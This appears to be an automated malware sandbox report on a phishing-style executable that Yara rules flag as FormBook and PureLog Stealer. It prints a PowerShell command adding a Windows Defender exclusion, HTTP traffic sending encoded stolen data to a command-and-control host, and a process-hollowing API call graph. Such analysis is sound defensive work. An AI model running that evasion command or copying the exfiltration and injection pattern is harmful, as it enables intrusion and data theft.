                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          40192.168.2.650016154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:03:01.077356100 CET1815OUTPOST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 4f 76 68 52 58 66 37 33 74 43 77 68 4b 35 69 48 6a 54 53 42 73 52 42 33 57 63 54 52 6d 30 39 71 4d 4c 42 63 38 5a 53 6d 79 76 31 72 58 4e 64 46 46 36 53 33 4b 78 6d 51 34 45 6c 30 74 4b 36 71 32 39 6f 38 77 78 5a 58 38 6c 2b 36 35 6f 49 2b 54 52 54 71 65 41 33 6d 33 53 6e 52 36 33 6e 55 31 6b 46 74 66 63 30 63 57 2f 4b 54 42 43 53 7a 63 45 56 75 4e 63 63 75 43 6b 2f 56 78 30 63 55 35 2f 7a 39 2b 46 69 59 6a 64 4b 6c 57 4e 6a 51 64 79 51 33 30 51 57 53 33 5a 54 77 70 45 30 74 68 51 38 4b 67 56 7a 62 6c 54 74 54 43 78 36 55 67 2f 70 33 6e 49 43 6e 31 31 59 7a 6c 2f 39 73 44 68 69 6a 70 6c 47 6a 61 74 33 45 68 79 65 4a 50 45 6a 64 31 48 4c 61 65 73 30 70 6a 30 45 46 6e 6b 61 59 4c 34 5a 49 34 65 62 4a 4d 6b 45 64 58 65 50 48 59 63 7a 53 36 32 6c 51 53 55 36 47 46 55 7a 34 73 56 61 6e 47 71 64 6f 36 6a 32 34 75 57 54 64 4c 5a 64 2b 52 78 31 36 70 49 54 67 2f 50 50 76 59 73 64 46 70 4b 42 4a 72 2f 49 50 6f 54 46 33 31 48 79 50 4b 61 6d 37 37 38 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5EOvhRXf73tCwhK5iHjTSBsRB3WcTRm09qMLBc8ZSmyv1rXNdFF6S3KxmQ4El0tK6q29o8wxZX8l+65oI+TRTqeA3m3SnR63nU1kFtfc0cW/KTBCSzcEVuNccuCk/Vx0cU5/z9+FiYjdKlWNjQdyQ30QWS3ZTwpE0thQ8KgVzblTtTCx6Ug/p3nICn11Yzl/9sDhijplGjat3EhyeJPEjd1HLaes0pj0EFnkaYL4ZI4ebJMkEdXePHYczS62lQSU6GFUz4sVanGqdo6j24uWTdLZd+Rx16pITg/PPvYsdFpKBJr/IPoTF31HyPKam778QkMVRncwjH4knHrITUda9gv8sXFlM8QkCl7nnb/bzUl4y9Pc0x29RR2MgU8gpApiLVRJzdY0YL2LISM60Ub07mgxlJEMLeDu5qzvP8DxYqL3Ags0tS9DQyFGdJtOWGcnEpDNySIwD9CXHpyu/OYqB277z8S25+6i18B4v2PrXg3F9ucMLtEdnEpgefk8FyzCzazRS6Dm3YqDwul/wspxyCRLJ1VpxfZbj110eNDNWNbScVQeF/SARjsflK8m9VSVUGc/uE3rehIswpUTx9TbL7AFlf1OkHLwgclQ1eENScOWqzh6UM+TbhjNyon3/SdWG4HyXHdIQlm1rdPEeugPEKc//gmQ8we2KDXWbhApbNEkPj+AkNpkPalqw3JeUfIyNWvHkQYc6OPy1BusBcjSSdZcWAQWXEn61CLLzvqjiQWitDvUC4a1jhLk+XqTkUXj9wuwu8yKWDDPu6/vz0D630gAo7qbFmDwk+3xaciuquUJq4QlGaa92PPQnj8REerVNsXjZhQGgDC14+ZuCB/jg8DEcy7KJRVIDzS8FGfi8N8Vm8i2j8oPQQ0luFr9NXja41iUX6J9+Swi5K2PhCRBPLUdiszAkrRn6BR6pNOrB5AlUA7TNGOEehbaLHZnaOAeIT3tWDUsGhUK+3as+qDbSkfQwnkAp3xdA3 [TRUNCATED]
                                                                                          Jan 8, 2025 15:03:02.605134010 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                          Jan 8, 2025 15:03:02.605355024 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                          Jan 8, 2025 15:03:02.605835915 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:01 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          41192.168.2.650017154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:03:03.783493042 CET517OUTGET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:03:04.648199081 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:03:04 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:08:58:58
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                                                                                          Imagebase:0xc30000
                                                                                          File size:882'688 bytes
                                                                                          MD5 hash:FA117772A94F43197A4632F47E78A56D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:08:58:59
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                                                                                          Imagebase:0x410000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:08:58:59
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:08:58:59
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe"
                                                                                          Imagebase:0xdb0000
                                                                                          File size:882'688 bytes
                                                                                          MD5 hash:FA117772A94F43197A4632F47E78A56D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:08:59:10
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe"
                                                                                          Imagebase:0xb40000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:08:59:12
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Windows\SysWOW64\Utilman.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\Utilman.exe"
                                                                                          Imagebase:0xb50000
                                                                                          File size:97'280 bytes
                                                                                          MD5 hash:4F59EE095E37A83CDCB74091C807AFA9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:08:59:26
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe"
                                                                                          Imagebase:0xb40000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:08:59:38
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff728280000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:11.7%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:1.4%
                                                                                            Total number of Nodes:219
                                                                                            Total number of Limit Nodes:16
                                                                                            execution_graph 38467 7839e00 38469 7839d84 38467->38469 38468 7839d52 38469->38468 38471 7839da1 PostMessageW 38469->38471 38472 7839ddc 38471->38472 38472->38467 38473 173d968 DuplicateHandle 38474 173d9fe 38473->38474 38475 1734668 38476 173467a 38475->38476 38477 1734686 38476->38477 38481 1734779 38476->38481 38486 1734204 38477->38486 38479 17346a5 38482 173479d 38481->38482 38490 1734878 38482->38490 38494 1734888 38482->38494 38487 173420f 38486->38487 38502 1735cc4 38487->38502 38489 1737088 38489->38479 38492 17348af 38490->38492 38491 173498c 38491->38491 38492->38491 38498 17344f0 38492->38498 38496 17348af 38494->38496 38495 173498c 38495->38495 38496->38495 38497 17344f0 CreateActCtxA 38496->38497 38497->38495 38499 1735918 CreateActCtxA 38498->38499 38501 17359db 38499->38501 38503 1735ccf 38502->38503 38506 1735ce4 38503->38506 38505 17372ad 38505->38489 38507 1735cef 38506->38507 38510 1735d14 38507->38510 38509 1737382 38509->38505 38511 1735d1f 38510->38511 38514 1735d44 38511->38514 38513 1737485 38513->38509 38515 1735d4f 38514->38515 38517 173878b 38515->38517 38520 173ae38 38515->38520 38516 17387c9 38516->38513 38517->38516 38524 173cf21 38517->38524 38529 173ae70 38520->38529 38532 173ae5f 38520->38532 38521 173ae4e 38521->38517 38525 173cf51 38524->38525 38526 173cf75 38525->38526 38541 173d200 38525->38541 38545 173d1f0 38525->38545 38526->38516 38536 173b352 38529->38536 38530 173ae7f 38530->38521 38533 173ae70 38532->38533 38535 173b352 GetModuleHandleW 38533->38535 38534 173ae7f 38534->38521 38535->38534 38537 173b381 38536->38537 38538 173b3a4 38536->38538 38537->38538 38539 173b5a8 GetModuleHandleW 38537->38539 38538->38530 38540 173b5d5 38539->38540 38540->38530 38542 173d20d 38541->38542 38543 173d247 38542->38543 38549 173b288 38542->38549 38543->38526 38546 173d20d 38545->38546 38547 173d247 38546->38547 38548 173b288 GetModuleHandleW 38546->38548 38547->38526 38548->38547 38550 173b293 38549->38550 38552 173df60 38550->38552 38553 173d5ac 38550->38553 38552->38552 38554 173d5b7 38553->38554 38555 1735d44 GetModuleHandleW 38554->38555 38556 173dfcf 38555->38556 38556->38552 38605 173d318 38606 173d35e GetCurrentProcess 38605->38606 38608 173d3b0 GetCurrentThread 38606->38608 38609 173d3a9 38606->38609 38610 173d3e6 38608->38610 38611 173d3ed GetCurrentProcess 38608->38611 38609->38608 38610->38611 38614 173d423 38611->38614 38612 173d44b GetCurrentThreadId 38613 173d47c 38612->38613 38614->38612 38615 78387e8 38616 7838802 38615->38616 38631 7838d57 38616->38631 38635 78390d0 38616->38635 38640 7838d30 38616->38640 38645 7839232 38616->38645 38650 7838db3 38616->38650 38655 7838c6e 38616->38655 38660 7839047 38616->38660 38664 7838c9c 38616->38664 38669 7838d98 38616->38669 38674 7838f9b 38616->38674 38679 7838e15 38616->38679 38684 7838cf6 38616->38684 38689 7838d16 38616->38689 38617 7838826 38697 78372a1 38631->38697 38701 78372a8 38631->38701 38632 7838d79 38632->38617 38636 783965d 38635->38636 38705 7837020 38636->38705 38709 7837018 38636->38709 38637 7839678 38641 7838d42 38640->38641 38713 78370f0 38641->38713 38717 78370f8 38641->38717 38642 78393f0 38646 783924c 38645->38646 38721 7836b31 38646->38721 38725 7836b38 38646->38725 38647 7839261 38651 7838cfe 38650->38651 38651->38617 38651->38650 38652 7838d10 38651->38652 38729 78371b1 38651->38729 38733 78371b8 38651->38733 38652->38617 38656 7838c71 38655->38656 38657 7838cd6 38656->38657 38737 7837440 38656->38737 38741 7837435 38656->38741 38657->38617 38662 78371b1 WriteProcessMemory 38660->38662 38663 78371b8 WriteProcessMemory 38660->38663 38661 783906f 38662->38661 38663->38661 38665 7838ca2 38664->38665 38667 7837440 CreateProcessA 38665->38667 38668 7837435 CreateProcessA 38665->38668 38666 7838cd6 38666->38617 38667->38666 38668->38666 38670 7838da5 38669->38670 38672 7836b31 ResumeThread 38670->38672 38673 7836b38 ResumeThread 38670->38673 38671 7839261 38672->38671 38673->38671 38675 7838cfe 38674->38675 38675->38617 38676 7838d10 38675->38676 38677 78371b1 WriteProcessMemory 38675->38677 38678 78371b8 WriteProcessMemory 38675->38678 38676->38617 38677->38675 38678->38675 38680 7838eaa 38679->38680 38745 78399fb 38680->38745 38751 7839a08 38680->38751 38681 7838ec3 38685 7838cfe 38684->38685 38685->38617 38686 7838d10 38685->38686 38687 78371b1 WriteProcessMemory 38685->38687 38688 78371b8 WriteProcessMemory 38685->38688 38686->38617 38687->38685 38688->38685 38690 7838e81 38689->38690 38692 7838cfe 38689->38692 38695 78371b1 WriteProcessMemory 38690->38695 38696 78371b8 WriteProcessMemory 38690->38696 38691 7838d10 38691->38617 38692->38617 38692->38691 38693 78371b1 WriteProcessMemory 38692->38693 38694 78371b8 WriteProcessMemory 38692->38694 38693->38692 38694->38692 38695->38691 38696->38691 38698 78372f3 ReadProcessMemory 38697->38698 38700 7837337 38698->38700 38700->38632 38702 78372f3 ReadProcessMemory 38701->38702 38704 7837337 38702->38704 38704->38632 38706 7837065 Wow64SetThreadContext 38705->38706 38708 78370ad 38706->38708 38708->38637 38710 7837065 Wow64SetThreadContext 38709->38710 38712 78370ad 38710->38712 38712->38637 38714 7837138 VirtualAllocEx 38713->38714 38716 7837175 38714->38716 38716->38642 38718 7837138 VirtualAllocEx 38717->38718 38720 7837175 38718->38720 38720->38642 38722 7836b78 ResumeThread 38721->38722 38724 7836ba9 38722->38724 38724->38647 38726 7836b78 ResumeThread 38725->38726 38728 7836ba9 38726->38728 38728->38647 38730 7837200 WriteProcessMemory 38729->38730 38732 7837257 38730->38732 38732->38651 38734 7837200 WriteProcessMemory 38733->38734 38736 7837257 38734->38736 38736->38651 38738 78374c9 38737->38738 38738->38738 38739 783762e CreateProcessA 38738->38739 38740 783768b 38739->38740 38742 7837440 38741->38742 38742->38742 38743 783762e CreateProcessA 38742->38743 38744 783768b 38743->38744 38746 7839a03 38745->38746 38747 7839984 38745->38747 38749 7837020 Wow64SetThreadContext 38746->38749 38750 7837018 Wow64SetThreadContext 38746->38750 38747->38681 38748 7839a33 38748->38681 38749->38748 